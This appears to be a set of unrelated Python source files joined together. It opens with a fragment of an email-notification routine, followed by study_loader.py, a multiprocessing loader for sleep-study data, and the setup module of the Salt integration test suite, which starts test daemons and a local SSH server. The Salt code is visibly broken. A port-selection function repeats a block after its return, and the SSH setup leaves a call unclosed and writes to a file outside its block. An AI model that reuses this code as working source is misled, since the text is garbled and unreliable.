primary_emails = [email.email for email in admin.emails if email.primary_email]
nonprimary_emails = [email.email for email in admin.emails if not email.primary_email]
# send notification to all primary-mailboxes.
if not len(primary_emails) == 0:
isSent = self.util.send_emails(sender, primary_emails, email_title, email_content)
# if fail to send emails to primary-mailboxes, sent email to one non-primary mailboxes.
if not isSent and not len(nonprimary_emails) == 0:
for nonpri_email in nonprimary_emails:
if self.util.send_emails(sender, [nonpri_email], email_title, email_content):
isSent = True
break
isNotified = isNotified or isSent
# todo remove this code
self.util.send_emails(sender, receivers_forced, email_title, email_content)
self.log.debug(team.name + ": dev_plan email notification result: " + str(isNotified))
return isNotified
|
study_loader.py
|
import logging
import os
from psg_utils.errors import CouldNotLoadError
from threading import Thread
from threading import Event as ThreadEvent
from multiprocessing import JoinableQueue, Process, Lock, Event, cpu_count
from time import sleep
logger = logging.getLogger(__name__)
def _load_func(load_queue, results_queue, load_errors_queue, lock, stop_event):
"""
Args:
load_queue:
Returns:
"""
while not stop_event.is_set():
to_load, dataset_id = load_queue.get()
try:
to_load.load()
results_queue.put((to_load, dataset_id))
except CouldNotLoadError as e:
with lock:
logger.warning("[ERROR in StudyLoader] "
"Could not load study '{}' (error: {})".format(to_load, e))
load_errors_queue.put((to_load, dataset_id))
finally:
load_queue.task_done()
def _gather_loaded(output_queue, registered_datasets, stop_event):
while not stop_event.is_set():
# Wait for studies in the output queue
sleep_study, dataset_id = output_queue.get(block=True)
load_put_function = registered_datasets[dataset_id][0]
load_put_function(sleep_study)
output_queue.task_done()
def _gather_errors(load_errors_queue, registered_datasets, stop_event):
while not stop_event.is_set():
# Wait for studies in the output queue
sleep_study, dataset_id = load_errors_queue.get(block=True)
error_put_function = registered_datasets[dataset_id][1]
error_put_function(sleep_study)
load_errors_queue.task_done()
def get_num_cpus(n_load_processes):
"""
n_load_processes: [None, int] The number of processes to spin up for study loading.
If None, uses int(os.environ['SLURM_JOB_CPUS_PER_NODE']) if set, otherwise
multiprocessing.cpu_count() (using all visible CPUs).
"""
if n_load_processes is None:
slurm_cpus = os.environ.get('SLURM_JOB_CPUS_PER_NODE')
if slurm_cpus:
logger.info(f"Environment variable SLURM_JOB_CPUS_PER_NODE={slurm_cpus}")
n_load_processes = int(slurm_cpus)
else:
num_cpus = cpu_count()
logger.info(f"multiprocessing.cpu_count() returned N={num_cpus} visible CPUs.")
n_load_processes = num_cpus
return n_load_processes
class StudyLoader:
"""
Implements a multithreading SleepStudy loading queue
"""
def __init__(self,
n_load_processes=None,
max_queue_size=50):
"""
Args:
n_load_processes: [None, int] The number of processes to spin up for study loading.
If None, uses int(os.environ['SLURM_JOB_CPUS_PER_NODE']) if set, otherwise
multiprocessing.cpu_count() (using all visible CPUs).
"""
# Setup load thread pool
self.max_queue_size = max_queue_size
self._load_queue = JoinableQueue(maxsize=self.max_queue_size)
self._output_queue = JoinableQueue(maxsize=self.max_queue_size)
self._load_errors_queue = JoinableQueue(maxsize=3) # We probably want to raise
# an error if this queue
# gets to more than ~3!
self.process_lock = Lock()
# Init loading processes
num_cpus = get_num_cpus(n_load_processes)
logger.info(f"Creating StudyLoader with N={num_cpus} loading processes...")
args = [self._load_queue, self._output_queue, self._load_errors_queue, self.process_lock]
self.processes_and_threads = []
self.stop_events = []
for _ in range(num_cpus):
stop_event = Event()
p = Process(target=_load_func, args=args + [stop_event], daemon=True)
p.start()
self.processes_and_threads.append(p)
self.stop_events.append(stop_event)
# Prepare loaded studies gathering thread
self._registered_datasets = {}
gather_loaded_stop_event = ThreadEvent()
self.gather_loaded_thread = Thread(target=_gather_loaded,
args=(self._output_queue,
self._registered_datasets,
gather_loaded_stop_event),
daemon=True)
self.stop_events.append(gather_loaded_stop_event)
self.processes_and_threads.append(self.gather_loaded_thread)
self.gather_loaded_thread.start()
# Start thread to collect load errors
gather_errors_stop_event = ThreadEvent()
self.gather_errors_thread = Thread(target=_gather_errors,
args=(self._load_errors_queue,
self._registered_datasets,
gather_errors_stop_event),
daemon=True)
self.processes_and_threads.append(self.gather_errors_thread)
self.stop_events.append(gather_errors_stop_event)
self.gather_errors_thread.start()
def stop(self):
logger.info(f"Stopping N={len(self.processes_and_threads)} StudyLoader processes and threads...")
for stop_event in self.stop_events:
stop_event.set()
for process_or_thread in self.processes_and_threads:
process_or_thread.join()
def qsize(self):
""" Returns the qsize of the load queue """
return self._load_queue.qsize
@property
def maxsize(self):
return self.max_queue_size
def join(self):
""" Join on all queues """
logger.info("Awaiting preload from {} (train) datasets".format(
len(self._registered_datasets)
))
self._load_queue.join()
logger.info("Load queue joined...")
self._output_queue.join()
logger.info("Output queue joined...")
self._load_errors_queue.join()
logger.info("Errors queue joined...")
def add_study_to_load_queue(self, study, dataset_id):
if dataset_id not in self._registered_datasets:
raise RuntimeError("Dataset {} is not registered. "
"Call StudyLoader.register_dataset before adding"
" items from that dataset to the loading "
"queue".format(dataset_id))
if self.qsize() == self.maxsize:
logger.warning("Loading queue seems about to block! "
"(max_size={}, current={}). "
"Sleeping until loading queue is empty "
"again.".format(self.maxsize,
self.qsize()))
while self.qsize() > 1:
sleep(1)
self._load_queue.put((study, dataset_id))
def register_dataset(self, dataset_id, load_put_function, error_put_function):
with self.process_lock:
if dataset_id in self._registered_datasets:
raise RuntimeWarning("A dataset of ID {} has already been "
"registered.".format(dataset_id))
self._registered_datasets[dataset_id] = (
load_put_function, error_put_function
)
def de_register_dataset(self, dataset_id):
with self.process_lock:
del self._registered_datasets[dataset_id]
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
Set up the Salt integration test suite
"""
# Import Python libs
from __future__ import absolute_import, print_function
import atexit
import copy
import errno
import logging
import multiprocessing
import os
import pprint
import re
import shutil
import signal
import socket
import stat
import subprocess
import sys
import tempfile
import threading
import time
from datetime import datetime, timedelta
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.cli_scripts import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.output
import salt.runner
import salt.utils.color
import salt.utils.files
import salt.utils.msgpack
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.exceptions import SaltClientError
# Import 3rd-party libs
import msgpack
from salt.ext import six
try:
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
except ImportError:
import socketserver
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
"""
Return a random unused port on localhost
"""
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(("127.0.0.1", 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64507, 64508, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith("darwin") else False
BSD = True if "bsd" in sys.platform else False
AIX = True if sys.platform.startswith("aix") else False
if (AIX or DARWIN) and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD or AIX:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = False
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer, object):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, "shutting_down"):
self.shutting_down.set()
super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
encoding = 'utf-8'
unpacker_kwargs = {}
if msgpack.version >= (0, 5, 2):
unpacker_kwargs['raw'] = False
else:
unpacker_kwargs['encoding'] = encoding
unpacker = msgpack.Unpacker(**unpacker_kwargs)
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
class TestDaemonStartFailed(Exception):
"""
Simple exception to signal that a test daemon failed to start
"""
class TestDaemon(object):
"""
Set up the master and minion daemons, and run related cases
"""
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 600
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(
self.parser.options.no_colors is False
)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ""
def __enter__(self):
"""
Start a master and minion
"""
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(self.master_opts)
# Set up PATH to mockbin
self._enter_mockbin()
self.minion_targets = set(["minion", "sub_minion"])
if self.parser.options.transport == "zeromq":
self.start_zeromq_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, "ssh", False):
self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
"~~~~~~~ Versions Report ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Versions Report ", inline=True)
print("\n".join(salt.version.versions_report()))
try:
print_header(
"~~~~~~~ Minion Grains Information ",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("~~~~~~~ Minion Grains Information ", inline=True)
grains = self.client.cmd("minion", "grains.items")
minion_opts = self.minion_opts.copy()
minion_opts["color"] = self.parser.options.no_colors is False
salt.output.display_output(grains, "grains", minion_opts)
try:
print_header(
"=",
sep="=",
inline=True,
width=getattr(self.parser.options, "output_columns", PNUM),
)
except TypeError:
print_header("", sep="=", inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_zeromq_daemons(self):
"""
Fire up the daemons used for zeromq tests
"""
self.log_server = ThreadedSocketServer(
("localhost", SALT_LOG_PORT), SocketServerRequestHandler
)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-master ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name="salt-master",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-master/{}".format(self.master_opts["id"]),
daemon_cli_script_name="master",
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name="salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="salt-minion/{}".format(self.minion_opts["id"]),
daemon_cli_script_name="minion",
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name="sub salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="sub-salt-minion/{}".format(
self.sub_minion_opts["id"]
),
daemon_cli_script_name="minion",
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name="salt-smaster",
daemon_id=self.syndic_master_opts["id"],
daemon_log_prefix="salt-smaster/{}".format(
self.syndic_master_opts["id"]
),
daemon_cli_script_name="master",
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name="salt-syndic",
daemon_id=self.syndic_opts["id"],
daemon_log_prefix="salt-syndic/{}".format(self.syndic_opts["id"]),
daemon_cli_script_name="syndic",
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=60)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts["id"])
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name="salt-proxy",
daemon_id=self.proxy_opts["id"],
daemon_log_prefix="salt-proxy/{}".format(self.proxy_opts["id"]),
daemon_cli_script_name="proxy",
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
"""
Create a roster file for salt's syndic
"""
roster_path = os.path.join(FILES, "conf/_ssh/roster")
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
"""
Generate keys and start an ssh daemon on an alternate port
"""
sys.stdout.write(
" * {LIGHT_GREEN}Starting {0} ... {ENDC}".format(
"SSH server", **self.colors
)
)
keygen = salt.utils.path.which("ssh-keygen")
sshd = salt.utils.path.which("sshd")
if not (keygen and sshd):
print(
"WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!"
)
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"key_test",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_err)
)
)
sshd_config_path = os.path.join(FILES, "conf/_ssh/sshd_config")
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "server")
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key")
server_dsa_pub_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key.pub")
server_ecdsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_ecdsa_key")
server_ecdsa_pub_key_file = os.path.join(
server_key_dir, "ssh_host_ecdsa_key.pub"
)
server_ed25519_priv_key_file = os.path.join(
server_key_dir, "ssh_host_ed25519_key"
)
server_ed25519_pub_key_file = os.path.join(
server_key_dir, "ssh_host.ed25519_key.pub"
)
for server_key_file in (
server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file,
):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[
keygen,
"-t",
"dsa",
"-b",
"1024",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_dsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_dsa_err)
)
)
keygen_process_ecdsa = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ecdsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_escda_err)
)
)
keygen_process_ed25519 = subprocess.Popen(
[
keygen,
"-t",
"ed25519",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ed25519_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_ed25519_err)
)
)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd_config"), "a"
) as ssh_config:
ssh_config.write("AuthorizedKeysFile {0}\n".format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write("HostKey {0}\n".format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write("HostKey {0}\n".format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write("HostKey {0}\n".format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd.pid")
self.sshd_process = subprocess.Popen(
[sshd, "-f", "sshd_config", "-o", "PidFile={0}".format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print(
"sshd had errors on startup: {0}".format(
salt.utils.stringutils.to_str(sshd_err)
)
)
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
self.prep_syndic()
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
sys.stdout.write(
' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(
**self.colors
)
if salt.utils.platform.is_darwin():
roster.write(" set_path: $PATH:/usr/local/bin/\n")
sys.stdout.write(" {LIGHT_GREEN}STARTED!\n{ENDC}".format(**self.colors))
@classmethod
def config(cls, role):
"""
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
"""
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
"""
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
"""
if "runtime_client" not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS[
"runtime_client"
] = salt.client.get_local_client(mopts=self.master_opts)
return RUNTIME_VARS.RUNTIME_CONFIGS["runtime_client"]
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = 'cache'
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
master_opts['pki_dir'] = 'pki'
master_opts['syndic_master'] = 'localhost'
pytest_stop_sending_events_file = os.path.join(TMP_ROOT_DIR, 'pytest_stop_sending_events_file_master')
with salt.utils.files.fopen(pytest_stop_sending_events_file, 'w') as wfh:
wfh.write('')
master_opts['pytest_stop_sending_events_file'] = pytest_stop_sending_events_file
file_tree = {
"root_dir": os.path.join(FILES, "pillar", "base", "file_tree"),
"follow_dir_links": False,
"keep_newline": True,
}
master_opts["ext_pillar"].append({"file_tree": file_tree})
# Config settings to test `event_return`
if "returner_dirs" not in master_opts:
master_opts["returner_dirs"] = []
master_opts["returner_dirs"].append(
os.path.join(RUNTIME_VARS.FILES, "returners")
)
master_opts["event_return"] = "runtests_noop"
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(
real_prefix, "Scripts", "virtualenv.exe"
)
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts['cachedir'] = 'cache'
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
minion_opts['pki_dir'] = 'pki'
minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
minion_opts["venv_bin"] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts['cachedir'] = 'cache'
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
sub_minion_opts['pki_dir'] = 'pki'
sub_minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
sub_minion_opts["venv_bin"] = virtualenv_binary
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
syndic_master_opts['cachedir'] = 'cache'
syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
syndic_master_opts['pki_dir'] = 'pki'
pytest_stop_sending_events_file = os.path.join(TMP_ROOT_DIR, 'pytest_stop_sending_events_file_syndic_master')
with salt.utils.files.fopen(pytest_stop_sending_events_file, 'w') as wfh:
wfh.write('')
